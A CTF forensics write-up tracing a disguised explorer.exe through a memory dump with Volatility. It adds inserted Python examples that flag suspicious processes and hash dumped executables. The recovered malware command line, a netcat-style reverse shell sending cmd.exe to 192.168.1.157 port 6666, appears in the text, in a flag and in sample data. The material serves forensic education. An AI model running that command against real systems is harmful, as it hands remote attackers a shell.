Hacktober 2020 CTF Write-Up (Forensics)

sumb0dy
5 min read · Oct 23, 2020

The Cyber Hacktics group, in support of NCSAM (National Cyber Security Awareness Month), hosted a CTF on 16–17 October. The event's challenges covered many topics, such as traffic analysis, forensics, steganography and so on.

This post focuses on some of the Forensics challenges. Keep in mind that, for these challenges, we already know from the first challenge in this category (Evil Twin) that the malware is an evil twin of explorer.exe.

So before we start, I will begin with a bonus challenge they released that involves identifying this malware, called Public Service.

Public Service (Bonus Challenge)

“There is a flag associated with the malicious process from Evil Twin on a popular site used to check malware hashes. Find and submit that flag.”

This is related to the malware you find in the Evil Twin challenge. I didn't solve the Evil Twin challenge, but a quick summary is: identify which process was duplicated to look legitimate. You can tell that it is explorer, because once you use Volatility to see where the processes are loaded from, one explorer process comes from a different path than the others.

So we know the malware is called explorer.exe. The first thing we want to do is somehow extract this file from the memory dump so we can hash it. As the challenge description mentions, we are using a popular site to check the malware hash (VirusTotal!). Volatility is the best tool for Linux out there when dealing with raw memory dumps.

It has a great plugin called procdump, which allows us to extract the executable of any process in a memory dump file.

We first run psscan and grep for explorer so we can find all explorer.exe processes in the dump. This also gives us their PIDs, which we need to extract them (and which are important information for later challenges). Now we can use procdump to extract each PID, in this case: 6096, 3100, 5448 and 2316. We see that 3100 fails, but that's okay.

Now that we have all the explorer.exe executables, we can hash them all. Once we have their md5sum, it's as easy as copying each hash and searching VirusTotal to see whether any known malware has the same hash.

We found it! But that's not the flag. Always look for information about the malware on VirusTotal, and I noticed there are two community comments on this particular sample.

One of the comments is the flag itself!

flag{h4cktober_ctf_2020_nc).

Now that we have most of the information about this malware, the other challenges in the forensics category become easier to deal with.

Hell Spawn 1

“What was the name of the process that spawned the malicious explorer.exe? Submit the flag as the name and extension of the process and the PID of the process, separated by an underscore: flag{process_name.ext_PID}"

Now that we have information about the malware, these next challenges become easier to solve.

We are tasked with finding which process spawned the malware. Volatility has a plugin that shows us the "tree" of processes. Here, we are looking for our malware's PPID (Parent PID).

Using the pstree plugin from Volatility (its output includes the [PID] and [PPID] columns) and grepping for the information we have from above, we can identify the malware and which PPID spawned it.

Now we know that PPID 3944 spawned our malware. We can use the same command and grep for that PPID to see which process it is:

We see that cmd.exe is PID 3944, and right below it, explorer.exe shows up as part of the search.

flag{cmd.exe_3944}

Commands

“What was the command used with the malicious explorer.exe? Submit the entire command as the flag: flag{program.exe --options argument}.”

Once again using Volatility, we can use its cmdline plugin to see the command line of every process in the memory dump.

With the information above about the malware, we can run this plugin and grep for the malware.

We have two commands here. The one we are looking for is: explorer.exe 192.168.1.157 6666 -e cmd.exe. The command before it seems to be setting up a backdoor with explorer.exe instead.
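The Hell Spawn 1 and Commands steps above are both "grep the plugin output for what we already know". The following script is an added example (not part of the original write-up, and not Volatility's own code) that parses Volatility 2 pstree and cmdline output and flags an explorer.exe instance whose parent is an interactive shell or whose command line is not the normal system binary path. The two output samples are constructed to look like Volatility 2 output: the PIDs, the PPID 3944, the parent name cmd.exe and the recovered command line are the values from this write-up; the offsets, thread/handle counts, timestamps and the other command lines are made up. The "normal" path and the shell-parent heuristic are assumptions of the example.

```python
import re

# Constructed sample of Volatility 2 "pstree" output for the Evil Twin dump.
# PIDs, the PPID 3944 and the cmd.exe parent come from the write-up; the
# offsets, thread/handle counts and timestamps are made up.
PSTREE_OUTPUT = """\
Name                                                  Pid   PPid   Thds   Hnds Time
-------------------------------------------------- ------ ------ ------ ------ ----
 0xfffffa80026cb890:explorer.exe                    2316   2276     33    847 2020-10-03 16:10:01 UTC+0000
. 0xfffffa8001f5b060:cmd.exe                        3944   2316      1     20 2020-10-03 16:12:50 UTC+0000
.. 0xfffffa8002144b30:explorer.exe                  5448   3944      4     79 2020-10-03 16:13:23 UTC+0000
 0xfffffa8002a1c060:explorer.exe                    6096   6020     21    610 2020-10-03 16:11:40 UTC+0000
 0xfffffa8002b33b30:explorer.exe                    3100   3088     19    590 2020-10-03 16:11:55 UTC+0000
"""

# Constructed sample of Volatility 2 "cmdline" output. The command line of
# PID 5448 is the one recovered in the write-up; the others are made up.
CMDLINE_OUTPUT = """\
************************************************************************
explorer.exe pid:   2316
Command line : C:\\Windows\\Explorer.EXE
************************************************************************
cmd.exe pid:   3944
Command line : C:\\Windows\\system32\\cmd.exe
************************************************************************
explorer.exe pid:   5448
Command line : explorer.exe 192.168.1.157 6666 -e cmd.exe
************************************************************************
explorer.exe pid:   6096
Command line : C:\\Windows\\Explorer.EXE
************************************************************************
explorer.exe pid:   3100
Command line : C:\\Windows\\Explorer.EXE
"""

# pstree rows look like "..  0x<offset>:<name>  <pid>  <ppid> ..." with leading
# dots showing tree depth; we only need name, PID and PPID.
PSTREE_RE = re.compile(r"^[\s.]*0x[0-9a-fA-F]+:(\S+)\s+(\d+)\s+(\d+)", re.M)
# cmdline rows come in pairs: "<name> pid: <pid>" then "Command line : <cmd>".
CMDLINE_RE = re.compile(r"^(\S+) pid:\s+(\d+)\s*\nCommand line : (.*)$", re.M)

# Heuristics (assumptions of this example): explorer.exe normally runs from
# this path with no arguments, and is not normally a child of a shell.
LEGIT_EXPLORER_CMDLINE = r"c:\windows\explorer.exe"
SHELL_PARENTS = {"cmd.exe", "powershell.exe"}


def parse_pstree(text):
    """Map PID -> (image name, PPID) from pstree output."""
    return {int(pid): (name, int(ppid)) for name, pid, ppid in PSTREE_RE.findall(text)}


def parse_cmdline(text):
    """Map PID -> command line from cmdline output."""
    return {int(pid): cmd.strip() for _, pid, cmd in CMDLINE_RE.findall(text)}


def find_evil_twins(procs, cmdlines, image="explorer.exe"):
    """Return a list of findings for instances of `image` that look spawned or
    invoked abnormally; an empty list means every instance looked normal."""
    findings = []
    for pid, (name, ppid) in procs.items():
        if name.lower() != image:
            continue
        parent_name = procs.get(ppid, ("<exited/unknown>", None))[0]
        cmd = cmdlines.get(pid, "")
        reasons = []
        if parent_name.lower() in SHELL_PARENTS:
            reasons.append(f"spawned by shell {parent_name} (PID {ppid})")
        if cmd.lower() != LEGIT_EXPLORER_CMDLINE:
            reasons.append(f"unexpected command line: {cmd}")
        if reasons:
            findings.append({"pid": pid, "ppid": ppid, "parent": parent_name,
                             "cmdline": cmd, "reasons": reasons})
    return findings


def flags_for(finding):
    """Format a finding the way the two challenges expect their flags."""
    return (f"flag{{{finding['parent']}_{finding['ppid']}}}",
            f"flag{{{finding['cmdline']}}}")


if __name__ == "__main__":
    hits = find_evil_twins(parse_pstree(PSTREE_OUTPUT), parse_cmdline(CMDLINE_OUTPUT))
    for h in hits:
        print(h["pid"], h["reasons"], flags_for(h))
```

On a real dump you would feed the script the captured output of `vol.py -f <dump> --profile=<PROFILE> pstree` and `... cmdline` (the profile is whatever Volatility identified for the image). The parent-is-a-shell and non-standard-command-line checks are exactly the two things the write-up noticed by eye; encoding them means the next explorer.exe twin in a different dump is flagged the same way.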

flag{explorer.exe 192.168.1.157 6666 -e cmd.exe}

Hell Spawn 2

“What is the MD5 hash of the malicious explorer.exe file from Evil Twin?”

This challenge was somewhat a "copy" of Public Service, if you did that one first: we already have the flag in hand. If you refer back to Public Service, we had to find the MD5 hash of the malware and then find the flag on VirusTotal.

So the approach we took was somewhat "reversed," because if you did the previous challenges before Public Service, you would still have all the information needed to get the malware.

So, to quickly repeat the process in a different way: by now we have the malware's PID and name, and we can make a more precise search for it:

Now our next step is to extract that specific process. Using procdump from Volatility, we want to get the process with PID 5448:

Once we have the file, we can hash it:

There we have it.

flag{360b48f831d9beb41544b45d0aa66b8a}
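Both Public Service and Hell Spawn 2 end with the same step: hash the executables procdump wrote out and look the hashes up. The script below is an added example (not from the original write-up or from Volatility) that hashes every file in a procdump output directory with MD5 and SHA-256, streaming so a large dump does not have to fit in memory, and compares the MD5s against a known-bad set. The file name pattern `executable.<PID>.exe` is what Volatility 2's procdump produces; the MD5 in the known-bad set is the one this write-up found; the file contents in the demo are constructed stand-ins, not the real sample.

```python
import hashlib
import os
import tempfile

# MD5 reported in the write-up for the malicious explorer.exe. In practice this
# set is populated from your own intel or earlier lookups.
KNOWN_BAD_MD5 = {"360b48f831d9beb41544b45d0aa66b8a"}


def hash_file(path, chunk_size=1 << 20):
    """Return (md5, sha256) hex digests of a file, read in chunks."""
    md5 = hashlib.md5()
    sha256 = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(chunk_size), b""):
            md5.update(chunk)
            sha256.update(chunk)
    return md5.hexdigest(), sha256.hexdigest()


def hash_dump_dir(directory):
    """Hash every regular file in a procdump output directory
    (Volatility 2 names them executable.<PID>.exe). Returns name -> (md5, sha256)."""
    results = {}
    for name in sorted(os.listdir(directory)):
        path = os.path.join(directory, name)
        if os.path.isfile(path):
            results[name] = hash_file(path)
    return results


def match_known(results, known_md5=KNOWN_BAD_MD5):
    """Return the names of dumped files whose MD5 is in the known-bad set."""
    return [name for name, (md5, _) in results.items() if md5 in known_md5]


def demo():
    """Constructed demo: two fake dumps, one of which we treat as known-bad.
    Returns (results, matches)."""
    with tempfile.TemporaryDirectory() as d:
        # Constructed stand-in contents; the real sample is not reproduced here.
        with open(os.path.join(d, "executable.5448.exe"), "wb") as f:
            f.write(b"abc")
        with open(os.path.join(d, "executable.6096.exe"), "wb") as f:
            f.write(b"MZ" + b"\x00" * 62)
        results = hash_dump_dir(d)
        # Treat the hash of the constructed "5448" file as known-bad for the demo.
        matches = match_known(results, known_md5={results["executable.5448.exe"][0]})
        return results, matches


if __name__ == "__main__":
    results, matches = demo()
    for name, (md5, sha256) in results.items():
        print(f"{name}  md5={md5}  sha256={sha256}")
    print("known-bad:", matches)
```

After `vol.py -f <dump> --profile=<PROFILE> procdump -p 5448 -D dumps/`, point `hash_dump_dir` at `dumps/`. Searching VirusTotal by hash, as the write-up does, also avoids uploading a sample from an engagement, which would share it with everyone; record the SHA-256 alongside the MD5, since most intel sources key on it.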


sumb0dy

CTF player, bug bounty hunter, and a curious person. I love challenges, and also teach and help people.